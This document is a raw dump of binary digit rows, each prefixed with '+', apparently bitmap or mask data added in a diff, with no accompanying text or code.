+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000010000000000000000000100000000000000000000000000010000000000000000000000100000010000100000000000000000000000000100000000000000000001000000000000000000000000000000010000010000000000000000000000000000100000010001000000001000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000001000000000010000000000000000000000000000000000000000000000000000000000000000000000000101001110100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000001000000000000000000000000000000000000000000000000000100000001000000000000000000000000000000000000000000000000100000100001000000100000001000000000000100000000001000000010010000000000000000000000000000010000000100000000001000000000000000000001000000000001000000000000000000000000000001000000100000001000000000000000000000000000000000000000000000000000000000000000000000101110000100010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100001000000000000000000000000000000011000000000000000110000000000100000001111000000111100000000100000000000000000000000000100000100000000000100000000010000000000000000000001100100100000000000000000000000000000000000000000011100000001111011000100100100101001000100000000000001100000011100000000000000000011001101000000000100000000000000010000011100100000000001000000000000000000000000000001001000000000000000000000000000000000000000000000000000000000000000000000000001011001111010100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000001000000000000000000000000000001000000000000000000000000000010000000001000000000100000000000000000000000000000000000000000000000000000000000000001000000000000000000000000100000000000000000000000000000000000000000000000001000000001000001000000100000100000000000000000000000010000010100000000000000000100000010000000000000000000000000000000010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100111110000010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000010000000001000000010000000000000000000000000000001010000000000000000000000000000000000000000000000010010000000000000000000000000000000000000000000001100000000010000000000000000001000000000000000000000010000001100000000000000001000000000000000000000000000000000001000001100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111010011101101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000100000000000000000001010000000100100000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000100000000000000000000000000000000000000000001100000001010010000000010000000000001000000000000000000000001000000000000000000000000000000000001000000000000000000000001000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110100100100011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101111010000000000000000000110111101000000000000001011110111111111110000000000000000000000000000000000000000000000000000000000000001000000010101010111100000000100000010000001100111100110000001000000011111111110011000000000000000000111111111111111100000000000011111111111111110000000000000000111111111111111100000000000011111111111111110000000000000000111111111111111100000000000000000000000000000000000000000000000000000000000000000000000000001010000000010100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010110110000000000000000000001011011000000000000001101101001111111110000000000000000000000000000000000000000000000000000000000000001000000011111111111100000000100000010000001100111100110000000000000001010101100010000000000000000000111111111111111100000000000011111111111111110000000000000000111111111101111100000000000011111111111111110000000000000000111111111111111100000000000000000000000000000000000000000000000000000000000000000000000000001110101101000111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111110000000000000000000001011011000000000000001101101000010110110000000000011111111000000000000000000000000000000001111000000000000000000000000110011000001000000001000000011110000000000010000000000010101100010000000000000000000111111111111111100000000000011111111111111110000000000000000111111111111111100000000000011111111111111110000000000000000111111111111111100000000000000000000000000000000000000000000000000000000000000000000000000001100110110101000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111110000000000000000000110111101000000000000001011110111101111010000000000011101110000000000000000000000000000000001111000000000000000000000000110011000000000000000000000011110000000000000000000000111111110011000000000000000000111111110111111100000000000011111111111111110000000000000000111111111111111100000000000011110111111111110000000000000000111111111111111100000000000000000000000000000000000000000000000000000000000000000000000000000110100011001110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000101010000000100000000000000000000000000000000000000000000010010100000001000000000000000000000000000000000000000100000000000000000000000000000000000000000000000011000000000000000000000000000000000000000000000000000000000000000000000000000000110000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101000010010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000001000000100000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010001011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000010000000000000100000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000100001000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111010011111100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001110111000111111111111111111111111111111111111111111111111111 +111100001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101001010000000000110000100000000010000001100000000000000000000001010010010010110001000001000110000010000000001000000000000000000000000000000000000000001111010000000000000000000010000000000000000000000111110010001001000011100000000000000010000000000000000000000011001000001110100111100110000000000000000000000000000000000000000000000110100001100000000000000000000000000000000000000000000000000000000000000000000000000000000001111111000111011111111111111111111111111111111111111111111111111 